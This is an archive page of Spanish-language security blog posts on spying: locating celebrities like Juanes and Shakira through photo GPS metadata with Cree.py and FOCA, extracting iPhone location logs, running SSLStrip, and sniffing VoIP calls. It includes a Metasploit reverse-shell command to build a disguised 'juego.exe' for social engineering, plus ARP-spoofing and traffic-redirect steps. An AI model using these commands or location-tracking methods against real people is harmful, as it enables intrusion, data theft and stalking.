La Comunidad DragonJAR » Espiar

Cómo localizar usuarios de twitter y flickr a través de sus fotos

DragoN — Sun, 04 Dec 2011 05:31:08 +0000

ACTUALIZADO: Este articulo fue citado por la W Radio en Colombia, además del periódico El Diario y Opinion de Bolivia, por tanto lo dejo de nuevo en portada para facilitar su búsqueda a los posibles lectores de esos medios.

También les cuento que de momento la herramienta esta teniendo problemas para autenticarse ante twitter, por lo que se recomienda seguir los pasos sugeridos por el autor de la misma en este enlace.

La geolocalización esta en auge, todos quieren saber donde están sus amigos y gustosos dan su información en sitios como Foursquare, DiOui o Facebook Places para no estar fuera de la “moda”, pero… ¿sabes quien ve realmente esta información?, muchas veces quienes publican estos datos en la red, no son conscientes de las consecuencias que esto puede acarrear.

Secuestradores, Violadores, Ladrones y demás delincuentes ya hacen uso de las nuevas tecnologías y la información que publicas en internet, para llevar a cabo sus delitos, como en el famoso caso de Lisa Montgomery; por eso debes ser consciente que la información que publicas en la red la puede ver CUALQUIER PERSONA y te recomendamos seguir los consejos que constantemente ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red.

Esta información es especialmente sensible cuando quien la publica, no es consciente que lo está haciendo, como es el caso de las fotos en cuyo interior (sus metadatos) se encuentra almacenada la ubicación GPS de donde fue tomada, una característica adoptada cada vez en mas cámaras, especialmente las integradas a teléfonos celulares inteligentes.

Gracias a El Maligno, me entero que Yiannis Kakavas ha desarrollado una herramienta llamada Cree.py, que automatiza el proceso de extracción y localización de la información GPS publicada en las fotos por un usuario de Twitter o Flickr, dejándola a la mano de cualquier persona.

La herramienta programada en Python y de código abierto, es muy fácil de utilizar, cuenta con versiones para Windows, GNU Linux y si resolvemos unas cuentas dependencias, podemos hacerla correr en Mac OS X.

Para este articulo analizaremos 2 de los famosos colombianos, que mas publican fotografías por Twitter…. @juanes y @Shakira

Lo primero que hacemos es abrir la herramienta, escribir la cuenta de Twitter o Flickr que queremos analizar (podemos usar un buscador también) y después presionar “Geolocate Targe”, esperamos unos minutos mientras se procesa la información…. obteniendo un mapa como el siguiente, donde podemos ver los puntos geolocalizados de las fotos obtenidas desde el perfil publico de @juanes

Para confirmar la información almacenada analizaremos las fotos descargadas por el Cree.py, con la FOCA, herramienta que permite analizar metadatos a imágenes y documentos.

Fotos bastante personales de @Juanes con su esposa Karen Martínez mientras estaban de viaje por Londres.

La ubicación de la oficina donde posiblemente produzcan los discos del artista

Haciendo arreglos a las canciones o las pistas…

Fotos del parque que se observa claramente en Creppy

Segunda foto del Hyde Park

Como podemos ver no es poca la información que cualquier persona puede obtener de la cuenta publica de Juanes, ¿los paparazzi sabrán de esto?, seguramente les sería de mucha utilidad….

Ahora pasamos a otra de nuestras celebridades… @shakira quien tampoco sabe que al publicar fotografías por Twitter, también esta publicando su ubicación, para ello seguimos el mismo procedimiento que con @juanes, buscamos su cuenta oficial, damos click en el botón “Geolocate Target” y esperamos que Cree.py haga su trabajo…

Después de esperar un poco, podemos ver algunas locaciones como el Coca Cola Park en South Africa.

Algunas direcciones en New York…

Y para corroborar el trabajo de cree.py de nuevo pasamos la FOCA a todas las fotos, logrando reconocer algunas de ellas.

Shakira con su novio de turno…

Foto del escenario antes de la presentación…

Ubicación de su camerino… ya sabes por si quieres darle un saludo…

En un late night show…

Algunos apuntes poco interesantes… ¿o no?

Detrás del telón…

En el escenario..

Como pueden ver obtener la ubicación de los famosos no es nada complicado, pero es igual de fácil obtener la tuya; Por eso es tan importante que sigas los consejos que constantemente ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red y seas mas cuidadoso con tu información.

Mas Información:
Pagina oficial del Proyecto Cree.py

También puede interesarte...

Ubicando a los dueños de un iPhone o iPad

DragoN — Fri, 29 Apr 2011 03:33:48 +0000

Hace unos días Pete Warden y Alasdair Allen publicaron una investigación en la que descubrieron un archivo con nombre consolidated.db en cuyo interior se encuentra almacenado un registro de las ultimas ubicaciones donde estuviéramos con nuestro dispositivo iOS.

La noticia le dió la vuelta al mundo en poco tiempo, logrando que Steve Jobs se pronunciara al respecto y saliera con la ya típica respuesta, “no lo hacemos, nuestra competencia sí”, pero por mucho que Jobs niegue el asunto, es un hecho que el archivo existe y que en él se encuentra un registro de nuestros pasos mientras tenemos nuestro dispositivo en el bolsillo, en este artículo vamos a ver los distintos métodos que tenemos para ubicar el archivo Consolidated.db, obtener e interpretar este registro.

La primera herramienta que veremos es iPhone Tracker, publicada por Warden y Allen junto con su investigación que de momento funciona solo en Mac OS X.

Obteniendo Geoposición de iPhone con iPhone Tracker

Primero que todo debemos obtener una copia del iPhone Tracker y para ello tenemos dos opciones

De cualquiera de las dos formas, cuando ejecutamos la aplicación tenemos algo como esto:

Donde el punto azul es el registro de nuestra posición y a medida que aumentamos el zoom de la imagen, tendremos mas detalle de este registro; Como pueden ver, el proceso es bastante sencillo y cualquier persona puede hacerlo si tienen un equipo con Mac OS X.

Pero los usuarios de windows también tienen varias herramientas para obtener este listado..

Obteniendo Geoposición de iPhone en Windows

Para sacar la posición GPS almacenada en el archivo consolidated.db en sistemas Microsoft Windows tenemos varias opciones, la primera iPhone Tracking for Windows.

Con el que podemos ubicar automáticamente el archivo consolidated.db de nuestro backup, delimitar las fechas en las que hicimos un recorrido y posicionar en un mapa las ultimas ubicaciones almacenadas por nuestro dispositivo.

La otra opción que tenemos en Windows es iPhoneTrackerWin, que como funcionalidad adicional, permite cargar el archivo consolidated.db de otras fuentes, por lo que si obtenemos el backup de otro iPhone, podemos visualizarlo gráficamente gracias a este software.

Como muchos han dicho ya el archivo consolidated.db es en realidad una base de datos en sqlite por lo que con cualquier FrontEnd de SQLite puedes visualizar la información de este archivo, aunque no gráficamente como las herramientas mencionadas anteriormente.

Obteniendo el Backup del iPhone/iPad con Metasploit

Si estamos realizando una auditoria de seguridad y sabemos que un funcionario de la organización auditada, cuenta con un dispositivo iOS con 3G (iPad o iPhone), podemos obtener la información de este dispositivo, por medio de un nuevo modulo con nombre apple_ios_backup desarrollado por el propio H.D. Moore, creador de nuestro framework favorito Metasploit.

Debemos tener una sección de meterpreter en el equipo donde tenemos el backup, para ello vamos a generar un binario con el meterpreter y por medio de ingeniería social, lograremos que lo ejecuten en el equipo donde se encuentra el backup.

dragon@bt:~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.13 X > juego.exe

Mientras dejamos a la escucha el handler que recibirá la conexión del ejecutable juego.exe

dragon@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.13 E

El ejecutable lo podemos empaquetar junto a cualquier otro programa y lograr que lo corran en el equipo deseado, una vez tenemos una sección meterpreter en la maquina, ejecutamos el modulo de apple_ios_backup para sacar las bases de datos (localización, mensajes sms, imágenes, archivos de preferencias).

meterpreter > run windows/gather/apple_ios_backup

Si el equipo víctima es un Vista o Windows 7 seguramente no tendrás problemas, pero si el equipo víctima es un Windows XP en español como en mi caso, tendremos que echarle mano al archivo modules/post/windows/gather/apple_ios_backup.rb como seguramente muchas veces te ha tocado hacer y cambiar las rutas para que funcionen en los sistemas XP con idioma español.

			if os =~ /Windows 7|Vista|2008/
				@appdata = '\\AppData\\Roaming'
				@users = drive + '\\Users'
			else
				@appdata = '\\Application Data'
				@users = drive + '\\Documents and Settings'
			end

En la linea 61 cambiamos “\\Application Data” por “\\Datos de programa” y probamos de nuevo consiguiendo que el modulo creado por H.D. Moore funcione sin problemas, obteniendo los backups almacenados en la maquina.

Por último les dejo un vídeo donde Alasdair Allan habla sobre este problema en los dispositivos de Apple.

Espero que les sea de utilidad este texto y dejen sus comentarios abajo…

También puede interesarte...

SSLStrip – Espiando tráfico SSL

DragoN — Sun, 30 May 2010 08:20:10 +0000

Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede espiar tu trafico SSL sin problemas.

El funcionamiento de SSLStrip es simple, reemplaza todas las peticiones “https://” de una página web por “http://” y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.

A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.

En resumen, los pasos serian:

1. Configurar IP Forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. Realizando ataque ARP MITM entre las 2 maquinas:
arpspoof -i eth0 -t VICTIMA HOST
3. Redireccionar trafico con iptables:
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
4. Iniciar SSLStrip en el puerto utilizado
python sslstrip.py -w archivo

Espero que les sea de utilidad y no olviden comentar

Mas Información:
Pagina Oficial del SSLStrip

También puede interesarte...

UCSniff – Sniffer para VoIP

DragoN — Wed, 01 Oct 2008 17:49:02 +0000

En el pasado evento Torrcon realizado en San Diego California del 26 al 28 de Septiembre, Jason Ostrom publico una nueva herramienta llamada UCSniff.

UCSniff es un Sniffer para el protocolo de Voz Sobre ip que permite interceptar llamadas de manera sencilla y casi automática, la herramienta tiene 3 modos de ejecucion:

aprendizaje: en este modo se examina todo el tráfico de una red y arma un mapa de ella para poder identificar que IP corresponde al numero telefónico.

usuario: en este modo se selecciona un usuario (identificado previamente en el mapeo de la red) y se monitorea todas las llamadas que recibe o realiza.

conversación: utilizando esta modalidad de la herramienta podremos seleccionar 2 usuarios y monitorear las conversaciones que estos 2 usuarios realicen.

En las modalidades de usuario y conversación no solo es posible saber cuando recibe o realiza las llamadas sino que también se pueden almacenar estas en un archivo de audio.

Ya se había comentado este tema en La Comunidad cuando publicamos los Vídeos y Vídeo Tutoriales relacionados con la Seguridad Informática entre los que se encontraba el vídeo de IronGeek donde se realiza Sniffer sobre Voz IP con el Cain & Abel.

Mas Información:
Toorcon
CNets
Sitio Oficial de UCSniffer en Sourceforge (actualmente sin contenido)